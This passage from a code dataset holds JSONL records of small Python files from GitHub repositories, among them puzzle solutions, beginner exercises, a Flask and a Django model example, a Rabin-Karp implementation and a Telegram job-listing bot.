find_shortest_path_to_a(map,source,target):\n shortestpaths=[[1e300 for b in map[0]] for c in map]\n\n visited=[[False for b in map[0]] for c in map]\n\n shortestpaths[source[0]][source[1]]=0\n unvisited=get_unvisited(visited,shortestpaths)\n while not visited[target[0]][target[1]] and len(unvisited)>0:\n if map[unvisited[0][0]][unvisited[0][1]]=='a':\n return shortestpaths[unvisited[0][0]][unvisited[0][1]],shortestpaths\n shortestpaths,visited=find_ways(*unvisited[0],shortestpaths,visited,True)\n unvisited = get_unvisited(visited,shortestpaths)\n\n return shortestpaths[target[0]][target[1]],shortestpaths\n\npart1,shortestpaths = find_shortest_path(map,source,target)\n\nprint('------------------------')\nprint('Part 1:',part1)\nprint('------------------------')\n\nbest,shortestpaths=find_shortest_path_to_a(map,target,source)\n\nprint_map(shortestpaths,map,target,source,'output.txt')\n\nprint('Part 2:',best)\nprint('------------------------')","repo_name":"psundstrom/advent-of-code-2022","sub_path":"Day12/day12.py","file_name":"day12.py","file_ext":"py","file_size_in_byte":4500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"7980875267","text":"from requests import Response, Session\nfrom pandas import concat, DataFrame, Series, to_datetime\nfrom datetime import timedelta\nimport logging\n\nLOGGER = logging.getLogger(__name__)\n\n\ndef download_past_hour(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"h\": str(page), \"f\": \"j\"})\n for page in range(1, 3)\n ]\n\n page_dataframes = [\n response_to_dataframe(response, \"Average powerdraw (W)\")\n for response in responses\n ]\n\n return concat(page_dataframes, sort=True).sort_index()\n\n\ndef download_past_day(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"w\": str(page), \"f\": \"j\"})\n for page in range(1, 4)\n ]\n\n page_dataframes = [\n response_to_dataframe(response, \"Average powerdraw (W)\")\n for response in responses\n ]\n\n return concat(page_dataframes, sort=True).sort_index()\n\n\ndef download_past_week(session: Session, base_url: str) -> DataFrame:\n url = f\"{base_url}/V\"\n\n responses = [\n session.get(url, params={\"d\": str(page), \"f\": \"j\"})\n for page in range(1, 7)\n ]\n\n page_dataframes 
= [\n        response_to_dataframe(response, \"Average powerdraw (W)\")\n        for response in responses\n    ]\n\n    return concat(page_dataframes, sort=True).sort_index()\n\n\ndef download_past_year(session: Session, base_url: str) -> DataFrame:\n    url = f\"{base_url}/V\"\n\n    responses = [\n        session.get(url, params={\"m\": str(page), \"f\": \"j\"})\n        for page in range(1, 13)\n    ]\n\n    page_dataframes = [\n        response_to_dataframe(response, \"Total power consumed (kWh)\", True)\n        for response in responses\n    ]\n\n    return concat(page_dataframes, sort=True).sort_index()\n\n\ndef response_to_dataframe(\n    response: Response, value_label: str, date_only=False\n) -> DataFrame:\n    data = response.json()\n    initial_time = to_datetime(data[\"tm\"])\n    time_offset = timedelta(seconds=data[\"dt\"])\n\n    values = Series(data[\"val\"]).dropna()\n    times = Series(\n        [initial_time + i * time_offset for i in range(len(values))]\n    )\n\n    if date_only:\n        times = times.dt.date\n\n    if data[\"un\"] == \"kWh\":\n        values = values.str.replace(\",\", \".\").astype(float)\n    else:\n        values = values.astype(int)\n\n    return DataFrame({\"time\": times, value_label: values}).set_index(\"time\")\n","repo_name":"brain-dev-null/electrolog","sub_path":"electrolog/data/download_functions.py","file_name":"download_functions.py","file_ext":"py","file_size_in_byte":2433,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"37883539271","text":"\"\"\"\nStatement:\nWrite a program that reads 5 numbers from the keyboard and stores them in a list. Rotate the elements of that list,\ni.e. the element at position 0 must move to position 1, the one at position 1 to position 2, and so on. The number\nin the last position must move to position 0. Finally, display the contents of the list.\n\nDate: 21/11/2023.\nAuthors: Sergio López Fernández.\n\"\"\"\n\nprint(\"This program rotates the elements of a list.\")\nprint(\"----------------------------------------------\")\n\nTOTAL_NUM = 5\nnumbers_list = []\n\nprint(\"Enter whole numbers:\")\nfor i in range(TOTAL_NUM):\n    numbers_list.append(int(input()))\n\nprint(\"Original list:\", numbers_list)\n\nlast_number = numbers_list[TOTAL_NUM - 1]\nfor i in range(TOTAL_NUM - 1, 0, -1):\n    numbers_list[i] = numbers_list[i - 1]\nnumbers_list[0] = last_number\n\nprint(\"Rotated list:\", numbers_list)\n","repo_name":"a21lofese/PIA","sub_path":"Arrays/Ejercicio4.py","file_name":"Ejercicio4.py","file_ext":"py","file_size_in_byte":891,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"16518144407","text":"from typing import List, Mapping\n\nfrom aiologger import Logger\n\nimport container\nfrom apps.api.main_app.v1.services.notifications import NotificationService\n\n\n@container.register\nclass GetNotificationsCase:\n    def __init__(\n        self,\n        logger: Logger,\n        service: NotificationService,\n    ):\n        self._logger = logger\n        self._service = service\n\n    async def __call__(self, user_id: str) -> List[Mapping]:\n        return await self._service.get_notifications(user_id)\n","repo_name":"pavivin/fastapi-di","sub_path":"src/apps/api/main_app/v1/cases/notifications.py","file_name":"notifications.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"70453249321","text":"n = int(input())+1\r\nmatriz = []\r\nfor j in range(n):\r\n    linha = []\r\n    a = input().split()\r\n    for k in range(n):\r\n        linha.append(int(a[k]))\r\n    
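# store the row just read; the grid is n lines of n integers (n was already incremented above)\r\n    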
matriz.append(linha)\r\nfor l in range(0,n-1):\r\n for c in range(0,n-1):\r\n cont = 0\r\n if matriz[l][c] == 1:\r\n cont += 1\r\n if matriz[l][c+1] == 1:\r\n cont += 1\r\n if matriz[l+1][c] == 1:\r\n cont += 1\r\n if matriz[l+1][c+1] == 1:\r\n cont += 1\r\n if cont > 1:\r\n print('S', end='')\r\n else:\r\n print('U', end='')\r\n print('')","repo_name":"juan-araujob/uri-online-judge","sub_path":"2168.py","file_name":"2168.py","file_ext":"py","file_size_in_byte":598,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22424483256","text":"'''\nSnorkel Candidate Version\n\n'''\nimport os\nimport sys\nimport glob\nimport hashlib\nimport cPickle\nfrom datetime import datetime\n\ndef dict2str(d):\n '''Convert dictionary to tuple pair string'''\n return str(d).encode(\"utf-8\",errors=\"ignore\")\n\n\ndef checksum(s):\n '''Create checksum for input object'''\n if type(s) is dict:\n s = dict2str(s)\n elif type(s) in [list,tuple]:\n s = \"|\".join(sorted(list(s)))\n m = hashlib.md5()\n m.update(s)\n return m.hexdigest()\n\n\ndef cands2str(candidates):\n '''Convert DeepDive Relations object to string'''\n convert = lambda x:x.encode(\"utf-8\",errors=\"ignore\")\n rela_func = lambda x:[\"{}:{}\".format(x.sentence[\"doc_id\"], x.sentence[\"sent_id\"])] + map(convert,x.mention1(\"words\")) + map(convert,x.mention2(\"words\"))\n entity_func = lambda x:[\"{}:{}\".format(x.sentence[\"doc_id\"], x.sentence[\"sent_id\"])] + map(convert,x.get_span())\n get_row = rela_func if str(type(candidates)) == \"Relations\" else entity_func\n # create string versions of candidates\n s = [\":\".join(get_row(c)) for c in candidates]\n return \"|\".join(sorted(s))\n\n\nclass CandidateVersioner(object):\n '''Create unique version ID for candidate set while saving to disk'''\n def __init__(self, rootdir, prefix=\"\", dicts={}):\n self.rootdir = rootdir\n self.prefix = prefix\n self.dicts = dicts\n self._candidates = {}\n self.filename = None\n self.checksum = None\n \n \n def snapshot(self, name, candidates):\n self._candidates[name] = candidates\n \n \n def save(self):\n '''Save checksummed version of candidate set. 
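The manifest is also written next to the pickle as a human-readable .checksums log. 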
This computes\n checksums based on dictionaries, input documents, and final\n candidate set'''\n candidates = reduce(lambda x,y:x+y, self._candidates.values())\n manifest = self._checksums(candidates, self.dicts)\n # dump candidates and log file\n ctype = \"RELATIONS.\" if str(type(self._candidates)) == \"Relations\" else \"ENTITIES.\"\n prefix = self.prefix + \".\" if self.prefix else \"\"\n self.filename = \"{}/{}{}{}\".format(self.rootdir,prefix,ctype,manifest[\"uid\"])\n \n cPickle.dump(self._candidates, open(\"{}.pkl\".format(self.filename),\"w\"))\n self._write_log(self.filename,manifest)\n self.checksum = manifest[\"uid\"]\n \n \n def load(self,checksum):\n filelist = glob.glob(\"{}*{}.pkl\".format(self.rootdir,checksum))\n if len(filelist) > 1:\n print>>sys.stderr,\"Warning: multiple matching checksums\" \n elif not len(filelist):\n print>>sys.stderr,\"Error: snapshot not found\" \n return {} \n fname = filelist[0]\n self._candidates = cPickle.load(open(fname,\"rb\"))\n self.filename = fname.strip(\".pkl\")\n self.checksum = checksum\n return self._candidates\n\n \n def _checksums(self, candidates, dicts):\n '''Compute MD5 checksums for all assets used to \n create this candidate set'''\n manifest = {}\n # dictionary checksums\n for name,d in dicts.items():\n manifest[\"dictionary:{}\".format(name)] = checksum(d) \n # doc and candidate checksum\n doc_ids = sorted(set([c.sentence[\"doc_id\"] for c in candidates]))\n manifest[\"doc_ids\"] = checksum(doc_ids)\n manifest[\"candidates\"] = checksum(cands2str(candidates))\n # some count data about candidates\n manifest[\"num_docs\"] = len(doc_ids)\n manifest[\"num_candidates\"] = len(candidates)\n # create unique checksum ID\n _,values = zip(*sorted(manifest.items()))\n values = map(str,values)\n manifest[\"uid\"] = checksum(reduce(lambda x,y:x+y,values))\n return manifest\n \n \n def _write_log(self,filename,manifest):\n # write checksums to text file\n ts = datetime.now()\n outfile = \"{}.checksums\".format(filename)\n with open(outfile,'w') as f:\n f.write(\"{0:<22}{1:^11}{2:<32}\\n\".format(\"ts\",\"=\",str(ts)))\n for key,value in sorted(manifest.items()):\n f.write(\"{0:<22}{1:^11}{2:<32}\\n\".format(key,\"=\",value))\n \n \n\n\n","repo_name":"HazyResearch/ddbiolib","sub_path":"ddbiolib/versioning/base_snorkel.py","file_name":"base_snorkel.py","file_ext":"py","file_size_in_byte":4179,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"18"} +{"seq_id":"3284579120","text":"from flask import Flask #nome minusculo pacote, nome maiusculo recurso/classe\nfrom flask_restful import Api\nfrom resources.hotel import Hoteis, Hotel # pasta que se torna pacote e dentro deste pacote, estamos chamando o arquivo hotel e importando a classe hoteis que é um recurso\n\napp = Flask(__name__)\napp.config['SQLALCHEMY_DATABASE_URI'] = 'sqlite:///banco.db' #caminho do banco\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napi = Api(app)\n\n@app.before_first_request #antes de tudo verifica se tem banco\ndef cria_banco(): #criando banco\n banco.create_all() # criando tabela\n\napi.add_resource(Hoteis, '/hoteis')\napi.add_resource(Hotel, '/hoteis/')\n\nif __name__ == '__main__': # se for chamado do app.py vai executar\n from sql_alchemy import banco\n banco.init_app(app)\n app.run(debug=True)\n\n# http://127.0.0.1:5000/hoteis -> raiz do site localhost / hoteis\n","repo_name":"Diagnoster/RestApi_bd","sub_path":"api 
rest/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":895,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"22503324562","text":"\ndetails = ['ahmed', 'a@a.com', 35, '01025465465', '0152146554']\nname, mail, age, *phone_numbers = details\n\nprint(mail)\nprint(name)\nprint(phone_numbers)\n\n# ______________________________________________________________\n\ndata = [\n ('male', 10, 12),\n ('female', 5, 7, 12)\n]\n\n\ndef males(data):\n return sum(data)\n\n\ndef females(data):\n return sum(data) * 2\n\n\nfor tag, *details_ in data:\n if tag == 'male':\n print(males(details_))\n if tag == 'female':\n print(females(details_))\n\n\n# ______________________________________________________________\n\ndef path_splitter(path: str):\n *root, dirName, fileName = path.split('\\\\')\n return {\"dir name\": dirName,\n \"file name\": fileName}\n\n\nprint(path_splitter(r\"/Data_structures_and Algorithmes/useful_astrisk.py\"))\n\n","repo_name":"mo-a1/intermediate-python3","sub_path":"Recipes From python cook book 3rd edition/Data_structures_and Algorithmes/useful_astrisk.py","file_name":"useful_astrisk.py","file_ext":"py","file_size_in_byte":797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"4400200132","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/3 11:13\n# @Author : Jamerri\n# @File : 4-8.py\n\ncubes = []\nfor value in range(1, 11):\n cube = value**3\n cubes.append(cube)\n\nprint(cubes)\n","repo_name":"jamerri/python_learning","sub_path":"chapter-four/4-8.py","file_name":"4-8.py","file_ext":"py","file_size_in_byte":182,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"17284560306","text":"import psonic\nimport random\n\ne = psonic.chord(psonic.E3, psonic.MINOR)\nprint(e)\n\n# Challenge: Write a while loop that randomly plays a note from the \n# e minor cord, for either 0.25, or 0.5 length of time\n# after it plays 30 notes it should stop\nwhile True:\n psonic.use_synth(psonic.PROPHET)\n psonic.play(random.choice(e), release=0.6)\n psonic.sleep(random.choice([0.25, 0.5]))","repo_name":"eecs110/winter2019","sub_path":"course-files/lectures/lecture_07/answers/12_random_music_1.py","file_name":"12_random_music_1.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"18"} +{"seq_id":"37343774629","text":"from datetime import datetime, timezone, timedelta, date\nimport feedparser\nimport requests\nimport telegram\nimport time\nimport json\nimport os\nimport sys\n\nTOKEN = os.environ['TELEGRAM_TOKEN']\nCHAT_ID = 0 # Your chat ID goes here\nTIMELIMIT = 90000 # Around 25 hours\nTAGS = ['python', 'java']\n\n\ndef check_if_remoteokio_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('published', '1991-01-24T03:00:00-00:00')[:-6]\n entry_date = datetime.strptime(parsed_date, '%Y-%m-%dT%H:%M:%S').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if just for USA\n invalid_regions = ['USA', 'America']\n entry_region = entry.get('location', '')\n\n if entry_region in invalid_regions:\n return False\n\n # Not valid if the entry does not contain any of the tags\n tags = [t.replace('+', ' ').upper() for t in TAGS]\n entry_tags = [t.get('term', '').upper() for t in entry.get('tags', [])]\n\n if not any(t in entry_tags 
for t in tags):\n return False\n\n return True\n\ndef check_if_weworkremotely_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('published', 'Thu, 24 Jan 1991 03:00:00 +0000')\n entry_date = datetime.strptime(parsed_date, '%a, %d %b %Y %H:%M:%S %z').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if just for USA\n invalid_regions = ['USA Only', 'North America Only']\n entry_region = entry.get('region', '')\n\n if entry_region in invalid_regions:\n return False\n\n # Not valid if the summary does not contain any of the tags\n tags = [t.replace('+', ' ').upper() for t in TAGS]\n entry_summary = entry.get('summary', '').upper()\n\n if not any(t in entry_summary for t in tags):\n return False\n\n return True\n\ndef check_if_workingnomads_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('pub_date', '1991-01-24T03:00:00-00:00')[:19]\n entry_date = datetime.strptime(parsed_date, '%Y-%m-%dT%H:%M:%S').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if just for USA\n invalid_regions = ['USA', 'America']\n entry_region = entry.get('location', '')\n\n if entry_region in invalid_regions:\n return False\n\n # Not valid if the entry does not contain any of the tags\n tags = [t.replace('+', ' ').upper() for t in TAGS]\n entry_tags = entry.get('tags').upper()\n #print(entry_tags)\n\n if not any(t in entry_tags for t in tags):\n return False\n\n return True\n\ndef check_if_remoteio_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('published', '1991-01-24 03:00:00')\n entry_date = datetime.strptime(parsed_date, '%Y-%m-%d %H:%M:%S').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n # Not valid if no tags are in the summary or the title\n tags = [t.upper() for t in TAGS]\n entry_summary = entry.get('summary', '').upper()\n entry_title = entry.get('title', '').upper()\n\n if not any(t in entry_summary for t in tags) and not any(t in entry_title for t in tags):\n return False\n\n return True\n\ndef check_if_githubjobs_offer_is_valid(entry):\n # Not valid if older than TIMELIMIT\n now = datetime.timestamp(datetime.now(timezone.utc))\n parsed_date = entry.get('created_at', 'Thu Jan 24 03:00:00 UTC 1991')\n entry_date = datetime.strptime(parsed_date, '%a %b %d %H:%M:%S UTC %Y').timestamp()\n\n if now - entry_date > TIMELIMIT:\n return False\n\n return True\n\n\ndef get_remoteio_offers():\n print('Getting Remote.io offers...')\n rss = feedparser.parse('https://s3.remote.io/feed/rss.xml')\n entries = rss.entries\n\n offers = [e for e in entries if check_if_remoteio_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company'),\n 'date': datetime.strptime(offer.get('published'), '%Y-%m-%d %H:%M:%S').strftime('%d-%m-%Y'),\n 'link': offer.get('link')\n }\n for offer in offers]\n\ndef get_workingnomads_offers():\n print('Getting Working Nomads offers...')\n session = requests.Session()\n session.headers['User-Agent'] = (\n f'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, '\n f'like Gecko) Chrome/34.0.1847.131 Safari/537.36')\n\n response = session.get(f'https://www.workingnomads.co/api/exposed_jobs/')\n entries = json.loads(response.text)\n\n offers = [e for e in entries if 
check_if_workingnomads_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company_name'),\n 'date': datetime.strptime(offer.get('pub_date')[:19], '%Y-%m-%dT%H:%M:%S').strftime('%d-%m-%Y'),\n 'location': offer.get('location'),\n 'link': offer.get('url')\n }\n for offer in offers]\n\ndef get_weworkremotely_offers():\n print('Getting We Work Remotely offers...')\n rss = feedparser.parse('https://weworkremotely.com/categories/remote-programming-jobs.rss')\n entries = rss.entries\n\n offers = [e for e in entries if check_if_weworkremotely_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company_name'),\n 'date': datetime.strptime(offer.get('published'), '%a, %d %b %Y %H:%M:%S %z').strftime('%d-%m-%Y'),\n 'location': offer.get('region'),\n 'link': offer.get('link')\n }\n for offer in offers]\n\ndef get_remoteokio_offers():\n print('Getting RemoteOK.io offers...')\n rss = feedparser.parse('https://remoteok.io/remote-jobs.rss')\n entries = rss.entries\n\n offers = [e for e in entries if check_if_remoteokio_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company'),\n 'date': datetime.strptime(offer.get('published')[:-6], '%Y-%m-%dT%H:%M:%S').strftime('%d-%m-%Y'),\n 'link': offer.get('link')\n }\n for offer in offers]\n\ndef get_githubjobs_offers():\n print('Getting GitHub Jobs offers...')\n session = requests.Session()\n session.headers['User-Agent'] = (\n f'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, '\n f'like Gecko) Chrome/34.0.1847.131 Safari/537.36')\n\n entries = []\n for tag in TAGS:\n response = session.get(f'https://jobs.github.com/positions.json?description={tag}&location=remote')\n entries.extend(json.loads(response.text))\n\n # Removing duplicates based on ID\n entries = list(dict((o['id'], o) for o in entries).values())\n\n # Extracting the useful info\n offers = [e for e in entries if check_if_githubjobs_offer_is_valid(e) is True]\n\n return [\n {\n 'title': offer.get('title'),\n 'company': offer.get('company'),\n 'date': datetime.strptime(offer.get('created_at'), '%a %b %d %H:%M:%S UTC %Y').strftime('%d-%m-%Y'),\n 'link': offer.get('url')\n }\n for offer in offers]\n\n\ndef main():\n remoteio = get_remoteio_offers()\n workingnomads = get_workingnomads_offers()\n weworkremotely = get_weworkremotely_offers()\n remoteokio = get_remoteokio_offers()\n githubjobs = get_githubjobs_offers()\n\n raw_offers = remoteio + workingnomads + weworkremotely + remoteokio + githubjobs\n\n offers = []\n for offer in raw_offers:\n offers.append(\n f'Role: *{offer.get(\"title\")}* \\n'\n f'Company: {offer.get(\"company\")} \\n'\n f'Date: {offer.get(\"date\")} \\n'\n f'Link: {offer.get(\"link\")} \\n'\n f'Location: {offer.get(\"location\")}'\n )\n\n return offers\n\ndef publish_offers(event, context):\n bot = telegram.Bot(token=TOKEN)\n offers = main()\n\n if len(offers) == 0:\n bot.sendMessage(chat_id=CHAT_ID, text='No new offers.')\n else:\n for o in offers:\n bot.sendMessage(chat_id=CHAT_ID, text=o, parse_mode=telegram.ParseMode.MARKDOWN) \n time.sleep(5)\n\n print(f'{len(offers[1:])} offers found and sent at {str(datetime.now().time())}')\n","repo_name":"ruromgar/remote_jobs_bot","sub_path":"handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":8449,"program_lang":"python","lang":"en","doc_type":"code","stars":16,"dataset":"github-code","pt":"18"} +{"seq_id":"36131187189","text":"import sys\n\nfrom django 
import forms\nfrom django.contrib.contenttypes import fields\nfrom django.contrib.contenttypes.models import ContentType\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\n\nif sys.version < \"3\":\n    text_type = unicode\nelse:\n    text_type = str\n\n\n@python_2_unicode_compatible\nclass CustomField(models.Model):\n    \"\"\"\n    A field abstract -- it describes what the field is. There is one of these\n    for each custom field the user configures.\n    \"\"\"\n\n    name = models.CharField(max_length=150)\n    content_type = models.ForeignKey(ContentType, on_delete=models.CASCADE)\n    field_type = models.CharField(\n        max_length=1,\n        choices=(\n            (\"t\", \"Text\"),\n            (\"a\", \"Large Text Field\"),\n            (\"i\", \"Integer\"),\n            (\"f\", \"Floating point decimal\"),\n            (\"b\", \"Boolean (Yes/No)\"),\n            (\"m\", \"Dropdown Choices\"),\n            (\"d\", \"Date\"),\n            (\"h\", \"Date Time\"),\n        ),\n        default=\"t\",\n    )\n    default_value = models.CharField(\n        max_length=5000,\n        blank=True,\n        help_text=\"You may leave blank. For Boolean use True or False\",\n    )\n    is_required = models.BooleanField(default=False)\n    mask = models.CharField(\n        max_length=5000,\n        blank=True,\n        help_text=\"You may leave blank. For use with jQuery Mask, ex: '00/00/0000' for date.\",\n    )\n    field_choices = models.CharField(\n        max_length=2000,\n        blank=True,\n        help_text=\"List the choices you want displayed, separated by commas. \"\n        \"This is only valid for Dropdown, Multiple, and Checkbox field types\",\n    )\n\n    def get_value_for_object(self, obj):\n        return CustomFieldValue.objects.get_or_create(field=self, object_id=obj.id)[0]\n\n    def __str__(self):\n        return self.name\n\n    def get_form_field(self):\n        universal_kwargs = {\n            \"initial\": self.default_value,\n            \"required\": self.is_required,\n        }\n        if self.field_type == \"b\":\n            return forms.BooleanField(**universal_kwargs)\n        elif self.field_type == \"i\":\n            return forms.IntegerField(**universal_kwargs)\n        elif self.field_type == \"f\":\n            return forms.FloatField(**universal_kwargs)\n        elif self.field_type == \"a\":\n            return forms.CharField(widget=forms.Textarea, **universal_kwargs)\n        elif self.field_type == \"m\":\n            choices = self.field_choices.split(\",\")\n            if self.is_required is True:\n                select_choices = ()\n            else:\n                select_choices = ((\"\", \"---------\"),)\n            for choice in choices:\n                select_choices = select_choices + ((choice, choice),)\n            return forms.ChoiceField(choices=select_choices, **universal_kwargs)\n        elif self.field_type == \"d\":\n            return forms.DateField(**universal_kwargs)\n        elif self.field_type == \"h\":\n            return forms.DateTimeField(**universal_kwargs)\n        return forms.CharField(**universal_kwargs)\n\n    class Meta:\n        unique_together = (\"name\", \"content_type\")\n\n\n@python_2_unicode_compatible\nclass CustomFieldValue(models.Model):\n    \"\"\"\n    A field instance -- contains the actual data. There are many of these, for\n    each value that corresponds to a CustomField for a given model.\n    \"\"\"\n\n    field = models.ForeignKey(\n        CustomField, related_name=\"instance\", on_delete=models.CASCADE\n    )\n    value = models.CharField(max_length=5000, blank=True, null=True)\n    object_id = models.PositiveIntegerField()\n    content_type = models.ForeignKey(\n        ContentType, blank=True, null=True, on_delete=models.CASCADE\n    )\n    content_object = fields.GenericForeignKey(\"content_type\", \"object_id\")\n\n    def __str__(self):\n        return text_type(self.value)\n\n    def save(self, *args, **kwargs):\n        super(CustomFieldValue, self).save(*args, **kwargs)\n        if not self.content_type:\n            self.content_type = self.field.content_type\n            self.save()\n\n    def clean(self):\n        form_field = self.get_form_field()\n        form_field.clean(self.value)\n        return super(CustomFieldValue, self).clean()\n\n    def get_form_field(self):\n        return self.field.get_form_field()\n\n    class Meta:\n        unique_together = (\"field\", \"object_id\")\n","repo_name":"willseward/django-custom-field","sub_path":"custom_field/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":4330,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"18"} +{"seq_id":"24363454009","text":"# Given two patterns, find the smaller pattern in the greater pattern.\n\n# Rabin-Karp is a pattern-matching algorithm.\n# To find a pattern (length m) inside a text (length n), we hash the pattern, hash each window of the text, and if the hashes match we have found a candidate index; otherwise we roll the hash on to the next window.\n\n# This gives a running time of O(n - m + 1) hash comparisons, but when there are spurious hits the hashes can match while the patterns do not, and in such cases the running time can go up to O(mn).\n\n# This is where the Rabin-Karp algorithm comes into the picture. It uses two formulas: \n# Modular arithmetic hashing function: h = c1*b**(m-1) + c2*b**(m-2) + ...\n# Rolling hash formula: new_hash = b*(hash - c_old*b**(m-1)) + c_new\n\n\n# https://python.plainenglish.io/a-simple-plagiarism-rate-checker-using-rabin-karp-string-matching-algorithm-in-python-e823d29d3f21\n\n# def rabin_karp(pattern, subPattern):\n# \tpattern = pattern.upper()\n# \tsubPattern = subPattern.upper()\n# \tlenPattern = len(pattern)\n# \tlenSubPattern = len(subPattern)\n# \tb = 26\n# \tsubHash = 0\n# \thash = 0\n# \tfor i in range(lenSubPattern):\n# \t\t# applying the modular arithmetic formula: hash = c * b**(m-i-1)\n# \t\tsubHash += ((ord(subPattern[i])) * b**(lenSubPattern-i-1))\n# \t\thash += ((ord(pattern[i])) * b**(lenSubPattern-i-1))\n# \tprint(subHash)\n# \tprint(hash)\n\n# \tfor i in range(lenPattern-lenSubPattern+1):\n# \t\tif i != 0:\n# \t\t\t# Rolling hash formula: b*(hash - c * b**(m-1)) + c\n# \t\t\thash = b * (hash - (ord(pattern[i-1]))*(b**(lenSubPattern-1)))+ (ord(pattern[lenSubPattern+i-1]))\n\t\t\n# \t\tif hash == subHash:\n# \t\t\treturn (f'Sub Pattern Index at: {i}')\n\n# \treturn False\n\n\n\ndef pattern_matching(main_pattern, sub_pattern):\n\t\n\tmain_pattern = main_pattern.lower()\n\tsub_pattern = sub_pattern.lower()\n\n\tbase = 26\n\n\tmain_hash = 0\n\tsub_hash = 0\n\n\tfor i in range(len(sub_pattern)):\n\t\t# applying the modular arithmetic formula: hash += c * b**(m-i-1)\n\t\tsub_hash += (ord(sub_pattern[i])) * (base**(len(sub_pattern) - i - 1))\n\t\tmain_hash += (ord(main_pattern[i]))* (base**(len(sub_pattern) - i - 1))\n\n\tfor i in range(len(main_pattern) - len(sub_pattern) + 1):\n\t\tif i != 0:\n\t\t\t# Rolling hash formula: new_hash = b*(hash - c_old*b**(m-1)) + c_new\n\t\t\tmain_hash = base * (main_hash - (ord(main_pattern[i-1])) * (base**(len(sub_pattern) -1))) + (ord(main_pattern[len(sub_pattern)+i-1]))\n\n\t\t# compare the characters on a hash match to rule out spurious hits\n\t\tif main_hash == sub_hash and main_pattern[i:i + len(sub_pattern)] == sub_pattern:\n\t\t\treturn i\n\ndef main():\n    string = 'vwxy'\n    seq = 'xy'\n    rks = pattern_matching(string, seq)\n    print(rks)\n\n    \nif __name__ == '__main__':\n    main()\n","repo_name":"mushahidmehdi/Data-Structure-Algorithms","sub_path":"Array and Strings/rabin_karp_algo.py","file_name":"rabin_karp_algo.py","file_ext":"py","file_size_in_byte":2519,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"18"} +{"seq_id":"40171335931","text":"# coding: utf-8\n\n\nfrom collections import Counter\n\n\nclass Container:\n\n    def __init__(self, dic):\n        self._list = [(key, dic[key]) for key in dic.keys()]\n        self._list = sorted(self._list, key=lambda x: x[1], reverse=True)\n        self._length = len(self._list)\n\n    def money(self):\n        length = self._length\n        items = self._list\n\n        if length == 1:\n            value = items[0][0]\n            return 50000 + (value * 5000)\n\n        if length == 2:\n            if items[0][1] == 3:\n                value = items[0][0]\n                return 10000 + (value * 1000)\n            else:\n                return 2000 + (items[0][0] * 500) + (items[1][0] * 500)\n        \n        if length == 3:\n            return 1000 + (items[0][0] * 100)\n\n        items.sort(reverse=True)\n        return 100 * items[0][0]\n\n\n\nn = int(input())\n\nma = 0\nfor _ in range(n):\n    numbers = [int(x) for x in input().split()]\n    numbers = Counter(numbers)\n    c = Container(numbers)\n    m = c.money()\n    if ma < m:\n        ma = m\n\nprint(ma)\n \n\n","repo_name":"lee-seul/baekjoon","sub_path":"2484.py","file_name":"2484.py","file_ext":"py","file_size_in_byte":1045,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"18"} +{"seq_id":"40121969047","text":"#Lirus: World's best deceiving pop-up, I think\nversion=\"1.0\"\n\n#Libraries 
